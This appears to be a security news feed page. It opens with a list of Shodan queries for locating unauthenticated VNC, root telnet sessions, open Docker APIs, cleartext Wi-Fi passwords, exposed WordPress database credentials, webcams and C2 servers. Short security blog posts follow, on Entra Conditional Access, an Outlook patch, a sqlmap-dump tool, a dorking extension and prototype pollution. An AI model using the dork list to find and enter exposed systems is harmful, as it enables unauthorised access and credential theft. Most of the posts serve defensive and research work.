
PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

C2 Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" product:"Cobalt Strike Beacon" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 ssl:foren.zik

Brute Ratel

http.html_hash:-1957161625 product:"Brute Ratel C4"

Covenant

ssl:"Covenant" http.component:"Blazor"

Metasploit

ssl:"MetasploitSelfSignedCA"

Network Infrastructure

Hacked routers:

Routers which got compromised hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway. title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

DNS Servers with recursion

"port: 53" Recursion: Enabled

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access. port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 "Active Management Technology"

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter's admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Etherium Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24



Top things that you might not be doing (yet) in Entra Conditional Access – Advanced Edition

18 March 2024 at 08:00
Top things you might not be doing (yet) in Entra ID Conditional Access - Advanced Edition

Introduction

In the first post of the top things that you might not be doing (yet) in Entra Conditional Access, we focused on basic but essential security controls that I recommend you checking out if you do not have them implemented already. In this second part, we’ll go over more advanced security controls within Conditional Access that, in my experience, are frequently overlooked in environments during security assessments. However, they can help you better safeguarding your identities.

Similar to my previous blog post, the list of controls provided here is not exhaustive. The relevance of each control may vary depending on your specific environment. Moreover, you should not rely on those only, but instead investigate whether they would bring any value in your environment. I also encourage you to check out other Conditional Access controls available to make sure your identities are correctly protected.

This article focusses on features that are available in Entra ID Premium P1 and P2 licenses. Therefore, if none of those licenses are available, check my previous blog post on how to protect identities in Entra ID Free: https://blog.nviso.eu/2023/05/02/enforce-zero-trust-in-microsoft-365-part-1-setting-the-basics/. Note that other licenses could also be required depending on the control.

Additionally, should you need any introduction to what Entra Conditional Access is and which security controls are available, feel free to have a look at this post: https://blog.nviso.eu/2023/05/24/enforce-zero-trust-in-microsoft-365-part-3-introduction-to-conditional-access/.

Finally, if you have missed part 1, feel free to check it out: https://blog.nviso.eu/2024/02/27/top-things-that-you-might-not-be-doing-yet-in-entra-conditional-access/.

Entra Conditional Access security controls

Make sure all Operating Systems are covered in your current Conditional Access design

License requirement: Entra ID Premium P1

When performing Entra Conditional Access assessments, we usually see policies to enforce controls on Windows, and sometimes Android and iOS devices. However, other platforms such as MacOS, Windows Phone, and Linux are sometimes forgotten. This can represent a significant gap in your overall security defense as access from those platforms is not restricted by default. You could use all the Conditional Access policy features, but if you do not include them, all your effort will be in vain.

Indeed, it is well known from attackers that “nonstandard” platforms are sometimes forgotten in Conditional Access. By trying to access your environment using them, they might be able to simply bypass your Conditional Access (CA) policies. It is therefore necessary to make sure that your security controls are applied across all operating systems.

The next points will shed some light on controls that you can implement to support all platforms.

Don’t be afraid of blocking access, but only in a considered and reasonable way 🙂

License requirement: Entra ID Premium P1

Based on our numerous assessments over the years, we have observed that ‘Block’ policies are typically not implemented in Conditional Access. While those policies can definitely have an adverse impact on your organization and end users, specific actions, device platforms, or client applications (see part 1), should be blocked.

For example, if you do not support Linux in your environment, why not simply block it? Moreover, if Linux is only required for some users, Conditional Access allows you to be very granular by targeting users, devices, locations, etc. Therefore, platforms can be blocked for most use cases, and you can still allow specific flows based on your requirements. This principle can be extended to (guest) user access to applications. Should guest users have access to all your applications? No? Then, block it. Such control effectively decreases the overall attack surface of your environment.

Conditional Access policy to block access to all cloud applications from Linux.
Example: Conditional Access policy to block access to all cloud applications from Linux.

I highly recommend you giving a thought to ‘Block’ policies. Moreover, they could be extended to many other scenarios on top of the device platforms and (guest) user access to cloud apps.

Before moving on to the next point, I want to highlight that such policies can be very powerful. So powerful that they could lock you out of your own environment. To avoid that, please, always exclude emergency / break-the-glass accounts. In addition, never rollout Conditional Access policies in production before proper testing. The report-only policy mode can be of great help for that. Moreover, the What If tool is also a very good tool that you should be using to assess the correctness of your policies. Once the potential impact and the policy configuration have been carefully reviewed, gradually roll out policies by waves over a period of a few weeks with different pilot groups.

Use App Protection Policies to reduce the risk of mobile devices

License requirement: Entra ID Premium P1 and Microsoft Intune

If access from mobile devices, i.e., Android and iOS, is required for end user productivity for example, App Protection Policies (APPs) can help you preventing data loss on devices that you may not fully manage. Note that App Protection Policies are also now available for Windows devices but are still in preview at the time of writing (beginning of March 2024).

In short, App Protection Policies are a set of rules that ensures that data access through mobile apps is secure and managed appropriately, even on personal devices. APPs can enforce the use of Microsoft-managed applications, such as Microsoft apps, enforce data encryption, require authentication, restrict actions between managed and unmanaged applications, wipe the data from managed applications, etc.

For that purpose, the following Grant control can be configured:

Enforce App Protection Policies in Conditional Access.
Example: Enforce App Protection Policies in Conditional Access.

Of course, to be effective, App Protection Policies should be created in Intune and assigned to users. Because of that, Microsoft Intune licenses are required for users in scope of that control.

Moreover, together with the Exchange Online and SharePoint Online app enforced restrictions capabilities, you can allow, restrict, or block access from third-party browsers on unmanaged devices.

Require Authentication Strengths instead of standard multi-factor authentication

License requirement: Entra ID Premium P1

Authentication Strength policies in Entra Identity Conditional Access enable administrators to mandate certain authentication methods, such as FIDO2 Security Keys, Windows Hello, Microsoft Authenticator, and passwordless authentication. Please note that the authentication methods available to users will be determined by either the new authentication method policies or the legacy MFA policy.

By configuring Authentication Strengths policies and integrating them in Conditional Access policies, you can further restrict (external) user access to sensitive applications or content in your organization. Built-in policies are also available by default:

Authentication strengths policies in Entra ID.
Built-in authentication strengths policies in Entra ID.

One common use case for Authentication Strength policies is to ensure that user accounts with privileged access are protected by requiring phishing-resistant MFA authentication, thus restricting access to authorized users only. In Conditional Access, this goal can be achieved through multiple methods:

  1. Secure Privileged Identity Management role activation with Conditional Access policies (see next point for more details);
  2. Include privileged Entra ID roles in Conditional Access, by selecting directory roles in the policy assignments;
  3. Integrate protected actions into Conditional Access policies to enforce step-up authentication when users perform specific privileged and high-impact actions (see next point for more details).

Other use cases include enforcing stricter authentication requirements when connecting from outside a trusted location, when a user is flagged with a risk in Identity Protection, or when accessing sensitive documents in SharePoint Online.

Finally, as mentioned above, external users (only those authenticating with Microsoft Entra ID, at the time of writing) can be required to satisfy Authentication Strengths policies. The behavior will depend on the status of the cross-tenant access settings, as explained in my previous blog post.

Use Authentication Context to protect specific actions and applications

License requirement: Entra ID Premium P1

Authentication Contexts in Conditional Access allow to extend the locations or actions covered by Conditional Access policies. Indeed, they can be associated with applications, SharePoint Online sites or documents, or even specific privileged and high impact actions in Entra ID.

Before diving into how they can be used, we will quickly go over how they can be created. Authentication Context is a feature of Microsoft Entra Conditional Access and can therefore be managed from the Conditional Access service. Before being able to use them, they need to be created and published to applications:

Add an authentication context in Microsoft Entra Conditional Access.
Add an authentication context in Microsoft Entra Conditional Access.

Once they have been created and published, we can use them in Conditional Access policies. Let’s take a closer look at the different scenarios described above:

  1. Integrate Authentication Contexts in Sensitivity Labels to require step-up authentication or enforce restrictions when accessing sensitive content:

In this first example, the Super-Secret sensitivity label has been configured to require step-up authentication when accessing documents with that label assigned:

Enforce step-up authentication in Sensitivity Labels.
Enforce step-up authentication in Sensitivity Labels.

If we configure the below CA policy with the target resource set to the ‘Sensitive documents’ Authentication Context, users will have to satisfy the phishing-resistant MFA requirements, unless it has already been satisfied, when accessing documents labeled with the Super-Secret label:

Conditional Access policy to require phishing-resistant MFA when accessing sensitive documents (i.e., documents labeled as Super-Secret in our example).
Example: Conditional Access policy to require phishing-resistant MFA when accessing sensitive documents (i.e., documents labeled as Super-Secret in our example).
  • Integrate Authentication Context with Privileged Identity Management roles to enforce additional restrictions on role activation (PIM requires Entra Premium P2 licenses):

Role settings in Entra Privileged Identity Management can be changed to require Authentication Context on role activation. That way, administrators can ensure that high privileged roles are protected against abuse and only available to authorized users themselves:

PIM role setting to require Microsoft Entra Conditional Access authentication context on activation.
PIM role setting to require Microsoft Entra Conditional Access authentication context on activation.

When such control is configured in PIM, users will not be prompted to perform MFA twice if the specified MFA requirement has been previously met during the sign-in process. On the other hand, they will be prompted with MFA if it hasn’t been met before.

Similar to the previous point, the same principle applies to the creation of the Conditional Access policy. The custom PIM Authentication Context should be set as the target resource, and the conditions and access controls configured to meet your security requirements.

Important note: when changing the configuration of high privileged roles, which allow to modify the configuration of Microsoft Entra PIM, make sure you are not locking yourself out of the environment by having at least one active assignment configured.

  • Integrate Entra ID Protected Actions with Conditional Access policies:

Finally, by integrating Entra Identity Protected Actions with Conditional Access, administrators can introduce an extra layer of security when users attempt specific actions, such as modifying Conditional Access policies. Once again, make sure you are not locking yourself out here.

With Protected Actions, you can require strong authentication, enforce a shorter session timeout or filter for specific devices. To create a Protected Action, administrators first need to create an Authentication Context, which will then be assigned to a set of actions in the ‘Entra ID Roles and administrators’-page:

Link protected actions in Entra ID to authentication context.
Link Protected Actions in Entra ID to Authentication Context.

In this example, the ‘Protected Actions’ Authentication Context has been linked to permissions that allow updating, creating, and deleting Entra Conditional Access policies.

Then, in a Conditional Access policy, set the target resource to the ‘Protection Actions’ Authentication Context and define the conditions as well as the access controls.

Once in effect, administrators will be required to meet the configured authentication requirements and/or conditions each time they attempt to modify Conditional Access policies:

Step-up authentication when performing an Entra ID protected actions.
Step-up authentication required when performing an Entra ID protected actions.

Use Device Filters in Conditional Access policies conditions

License requirement: Entra ID Premium P1

Last but not least, the ‘Filter for devices’-condition in Entra Conditional Access is a powerful tool that can be used for multiple purposes. Indeed, by using this condition, it is possible to target specific devices based on their ID, name, Ownership, compliance or join state, model, operating system, custom attributes, etc.

Besides the common scenarios of using the device filter condition to target compliant, non-compliant, registered, or joined devices, it can be used to restrict or block access based on more advanced conditions. For instance, you might require that only devices with certain operating system versions, specific device IDs, or device names that follow a particular pattern are allowed to access specific applications. Custom attributes can also be useful for more granularity, if needed.

The following filter will target devices meeting the following criteria:

  • The display name of the device should contain ‘ADM’;
  • The device should be seen as compliant, in Microsoft Intune, for instance;
  • The device state should be Microsoft Entra joined;
  • And the ExtensionAttribute4 should contain ‘anyvalue’. Extension Attributes for Entra ID registered devices can be added and customized using the Microsoft Graph REST API.
Device filter condition in Entra Conditional Access policies.
Example: Device filter condition in Entra Conditional Access policies.

More information about the different operators and properties can be found in the ‘Resources’-section below.

Bonus: Restrict authentication flows

License requirement: Entra ID Premium P1

The ability to restrict authentication flows in Microsoft Entra Conditional Access, which is still in preview, has been introduced end of February (when I was writing this blog post). I included it to make sure that you are aware of this new feature. However, I do not recommend implementing it in production before it is released in General Availability (at least without proper investigation and testing!).

This functionality has been introduced as a new condition in Microsoft Entra Conditional Access policies and allows to restrict device code flow and authentication transfer.

Firstly, the device code flow has been introduced to facilitate user sign-in on input-constrained devices, referred to as ‘device A.’ With this flow, users can authenticate on ‘device A’ by using a secondary device, referred to as ‘device B.’ They do this by visiting the URL: https://login.microsoftonline.com/common/oauth2/deviceauth. Once the user successfully signs in on ‘device B,’ ‘device A’ will receive the necessary access and refresh tokens.

The flow can be represented as follows:

Device code flow authentication.
Device code flow authentication.

However, this functionality has been, and still is, abused by attackers attempting to trick users into entering the device code and their credentials.

Therefore, Conditional Access policies could now be used to block device code flow, or restrict it to managed devices only. This measure helps ensure that phishing attempts are unlikely to succeed unless the attackers possess a managed device.

Conditional Access policy to block the use of device code flow.
Example: Conditional Access policy to block the use of device code flow.

Moreover, device code flow authentication attempts are visible in the Entra ID Sign-in Logs:

Device code flow authentication attempt.
Device code flow authentication attempt.
Identify device code flow sign-in activities with KQL.
Identify device code flow sign-in activities with KQL.

Secondly, authentication transfer enables users to transfer their authenticated state from one device to another, for instance, by scanning a QR code with their mobile phone from a desktop application. This functionality allows to reduce the number of times users have to authenticate across the different platforms. However, by doing so, users aren’t required to perform MFA again on their mobile phone if they have already performed MFA on their laptop.

Like device code flow authentication, authentication transfer can be blocked using a Conditional Access policy. To do so, simply select ‘Authentication transfer’ under Transfer methods.

Finally, authentication transfer can also be detected in the Entra ID Sign-in logs. Indeed, ‘QR code’ is set as the authentication method in the authentication details.

Evaluate Conditional Access policies

License requirement: Entra ID Premium P1

As a final note, I wanted to highlight the What If tool in Entra Conditional Access. It allows administrators to understand the result of the CA policies in their environment. For that purpose, administrators can select target users, applications, any available conditions, etc., to make sure that existing CA policies have the expected behavior. It also helps troubleshooting the configuration by gaining visibility into the policies that apply to users under specific conditions. The What If tool can be accessed in Entra ID > Conditional Access > Policies:

What if tool in Entra Conditional Access.
What if tool in Entra Conditional Access.

Moreover, the DCToolbox PowerShell module, which is an amazing toolbox for various Microsoft 365 security tasks, developed by Daniel Chronlund, also allows you to evaluate your current Conditional Access policies for a specific scenario. For that purpose, you can use the Invoke-DCConditionalAccessSimulation function and the tool will fetch all existing CA policies and evaluates them against the scenario that you have provided as arguments. You can find the DCToolbox PowerShell module on GitHub here: https://github.com/DanielChronlund/DCToolbox.

I highly recommend using one of these tools to evaluate your newly created or existing Conditional Access policies. Also note that proper testing and validation with different pilot phases and progressive rollouts is essential to avoid impacting end users when creating new policies.

Finally, as a general best practice, Conditional Access policies, and potential exceptions, should be properly documented. For that purpose, the DCToolbox tool allows you to export the current configuration of your Conditional Access policies in an Excel file, for example.

Conclusion

In this second blog post about Entra Conditional Access settings and configurations, we went over important principles that might help you increase the overall security posture of your environment. As for the first part, the settings and configuration items that I have highlighted could be considered when designing or reviewing your Entra Conditional Access implementation. This list is non-exhaustive and has been made based on my experience reviewing and implementing Conditional Access policies in different environments. Also, it is important to rigorously evaluate any policies before rolling them out in production and to make sure that other controls have also been properly configured in your cloud environment. Conditional Access policies are a great way to safeguard your identities and critical resources, but are not the only layer of defense that you should be relying on.

At NVISO, we have built an expertise reviewing cloud environments and have designed and implemented Entra Conditional Access on numerous occasions. If you want to know more about how we can help you in the journey of building or strengthening your Conditional Access setup, among others, feel free to connect on LinkedIn or visit our website at https://www.nviso.eu.

Resources

You can contact me on LinkedIn should you have any questions or remarks. My contact details can be found below.

Additionally, if you want to get a deeper understanding of some of the topics discussed in the blog post, all the resources that I have used can be found below:

About the author

Guillaume Bossiroy

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Entra ID Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Route to Safety: Navigating Router Pitfalls

18 March 2024 at 00:00
Introduction Wi-Fi routers have always been an attractive target for attackers. When taken over, an attacker may gain access to a victim’s internal network or sensitive data. Additionally, there has been an ongoing trend of attackers continually incorporating new router exploits into their arsenal for use in botnets, such as the Mirai Botnet. Consumer grade devices are especially attractive to attackers, due to many security flaws in them. Devices with lower security often contain multiple bugs that attackers can exploit easily, rendering them vulnerable targets.

Exploitation of a kernel pool overflow from a restrictive chunk size (CVE-2021-31969)

24 November 2023 at 00:00
Introduction The prevalence of memory corruption bugs persists, posing a persistent challenge for exploitation. This increased difficulty arises from advancements in defensive mechanisms and the escalating complexity of software systems. While a basic proof of concept often suffices for bug patching, the development of a functional exploit capable of bypassing existing countermeasures provides valuable insights into the capabilities of advanced threat actors. This holds particularly true for the scrutinized driver, cldflt.
Before yesterdayMain stream

mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite

By: Zion3R
17 March 2024 at 11:30


mapXplore is a modular application that imports data extracted of the sqlmap to PostgreSQL or SQLite database.

Its main features are:

  • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
  • Sanitized information, which means that at the time of import, it decodes or transforms unreadable information into readable information.
  • Search for information in all tables, such as passwords, users, and desired information.
  • Automatic export of information stored in base64, such as:

    • Word, Excel, PowerPoint files
    • .zip files
    • Text files or plain text information
    • Images
  • Filter tables and columns by criteria.

  • Filter by different types of hash functions without requiring prior conversion.
  • Export relevant information to Excel or HTML

Installation

Requirements

  • python-3.11
git clone https://github.com/daniel2005d/mapXplore
cd mapXplore
pip install -r requirements

Usage

It is a modular application, and consists of the following:

  • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
  • import: It is responsible for importing and processing the information extracted from sqlmap.
  • query: It is the main module capable of filtering and extracting the required information.
    • Filter by tables
    • Filter by columns
    • Filter by one or more words
    • Filter by one or more hash functions within which are:
      • MD5
      • SHA1
      • SHA256
      • SHA3
      • ....

Beginning

Allows loading a default configuration at the start of the program

python engine.py [--config config.json]

Modules



Dorkish - Chrome Extension Tool For OSINT & Recon

By: Zion3R
16 March 2024 at 11:30


During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.


Installation And Setup

1- Clone the repository

git clone https://github.com/yousseflahouifi/dorkish.git

2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- click on Load unpacked extension button and select the dorkish folder.

Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/

Features

Google dorking

  • Builder with keywords to filter your google search results.
  • Prebuilt dorks for Bug bounty programs.
  • Prebuilt dorks used during the reconnaissance phase in bug bounty.
  • Prebuilt dorks for exposed files and directories
  • Prebuilt dorks for logins and sign up portals
  • Prebuilt dorks for cyber secruity jobs

Shodan dorking

  • Builder with filter keywords used in shodan.
  • Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.

Usage

Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

TODO

  • Add more useful dorks and catogories
  • Fix some bugs
  • Add a search bar to search through the results
  • Might add some LLM models to build dorks

Notes

I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

Warning

  • I am not responsible for any damage caused by using the tool


CISSP exam tips and tricks part two | Cyber Work Hacks

By: Infosec
15 March 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CISSP exam. Today’s Hack is part two, so I encourage you to go back and listen to part one of Steve Spearman’s CISSP exam tips and tricks. In part two, I pass the mic to Spearman to give you his top five test-taking strategies for the CISSP. What’s the Sesame Street rule? How does the CISSP feel about absolutes? Keep it here, and you’ll find out in part two of this week’s Cyber Work Hack. 

1:30 - Look for absolutes in questions
3:17 - The Sesame Street principle 
4:45 - Watch for algebraic equations 
6:23 - Look for the "golden words"
7:38 - Change management is likely the answer
8:55 - Keep an eye on senior management and impact
10:19 - Think like a CISO
11:53 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Micropatches Released for Microsoft Outlook "MonikerLink" Remote Code Execution Vulnerability (CVE-2024-21413)

15 March 2024 at 15:06

 


In February 2024, still-Supported Microsoft Outlook versions got an official patch for CVE-2024-21413, a vulnerability that allowed an attacker to execute arbitrary code on user's computer when the user opened a malicious hyperlink in attacker's email.

The vulnerability was discovered by Haifei Li of Check Point Research, who also wrote a detailed analysis. Haifei reported it as a bypass for an existing security mechanism, whereby Outlook refuses to open a file from a shared folder on the Internet (which could expose user's NTLM credentials in the process). The bypass works by adding an exclamation mark ("!") and some arbitrary text to the end of the file path, which turns the link into a "Moniker link". When opening moniker links, Windows download the file, open it and attempt to instantiate the COM object referenced by the text following the exclamation mark. An immediate result of this is that an SMB request is automatically sent to the remote (attacker's) server, revealing user's NTLM credentials. An additional risk is that this could lead to arbitrary code execution.

 

Official Patch

Microsoft patched this issue by effectively cutting off  "Moniker link" processing for Outlook email hyperlinks. They did this in an unusual way, however. In contrast to their typical approach - changing the source code and rebuilding the executable file -, they ventured deep into "our" territory and hot-patched this issue with an in-memory patch. Hmm, why would they do that?

The answer lies in the fact that the behavior they wanted to change is implemented in ole32.dll,  but this DLL is being used by many applications and they didn't want to affect them all (some of them may rely on moniker links being processed). So what they did was use their Detours package to replace ole32.dll's  MkParseDisplayName function (the one parsing moniker links) with an essentially empty function - but only in Outlook.


Our Micropatch

While still-supported Microsoft Office versions have received the official vendor fix for this vulnerability, Office 2010 and 2013 - which we have security-adopted - are also vulnerable. In order to protect our users, we have created our own micropatch for this vulnerability.

We could implement a logically identical patch to Microsoft's by patching ole32.dll and checking in the patch if the running process is outlook.exe - but since ole32.dll is a Windows system file, this would require creating a patch for all Windows versions and then porting the patch every time this file is updated by Windows updates in the future. Not ideal.

Instead, we decided to take a different route. When parsing the hyperlink, Outlook at some point calls the HlinkCreateFromString function, which then calls further into ole32.dll and eventually to MkParseDisplayName, which we wanted to cut off.

A quick detour (pun intended) of our own here: The HlinkCreateFromString documentation states the following:

[Never pass strings from a non-trusted source. When creating a hyperlink with HlinkCreateFromString, the pwzTarget parameter is passed to MkParseDisplayNameEx. This call is safe, but the less safe MkParseDisplayName will be called for the string under the following circumstances:

    Not a file or URL string.
    Does not contain a colon or forward slash.
    Less than 256 characters.

A pwzTarget string of the form "@progid!extra" will instantiate the object registered with the specified progid and, if it implements the IMoniker interface, invoke IMoniker::ParseDisplayName with the "extra" string. A malicious object could use this opportunity to run unexpected code. ]

This, we believe, is the reason why Microsoft categorized the flaw at hand as "remote code execution."

Okay, back to our patch. There exists a function very similar to HlinkCreateFromString called HlinkCreateFromMoniker. This function effectively does the same with a moniker as the former does with a string, but without ever calling MkParseDisplayName. Our patch now simply replaces the call to (unsafe) HlinkCreateFromString with a call to (safe) HlinkCreateFromMoniker using a moniker that it first creates from the hyperlink string. To minimize the impact, this is only done for "file://" URLs containing an exclamation mark.


Micropatch Availability

The micropatch was written for the following security-adopted versions of Office with all available updates installed:

  1. Microsoft Office 2013
  2. Microsoft Office 2010

This micropatch has already been distributed to, and applied on, all online 0patch Agents in PRO or Enterprise accounts (unless Enterprise group settings prevented that). 

Vulnerabilities like this one get discovered on a regular basis, and attackers know about them. If you're using Office 2010 or 2013, 0patch will make sure such vulnerabilities won't be exploited on your computers - and you won't even have to know or care about updating.

If you're new to 0patch, create a free account in 0patch Central, then install and register 0patch Agent from 0patch.com, and email [email protected] for a trial. Everything else will happen automatically. No computer reboot will be needed.

To learn more about 0patch, please visit our Help Center

We'd like to thank Haifei Li for sharing their analysis, which allowed us to create a micropatch and protect our users against this attack. We also encourage all security researchers to privately share their analyses with us for micropatching.

A Look at Software Composition Analysis

13 March 2024 at 23:00

Software Supply Chain as a factory assembly line

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Finding the right tool

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications, with cloud components to them and the last is integrated into the GitHub(.com) environment directly. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of dependency alerts.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.

False Positive Rate

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at [email protected].

Unveiling the Server-Side Prototype Pollution Gadgets Scanner

16 February 2024 at 23:00

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

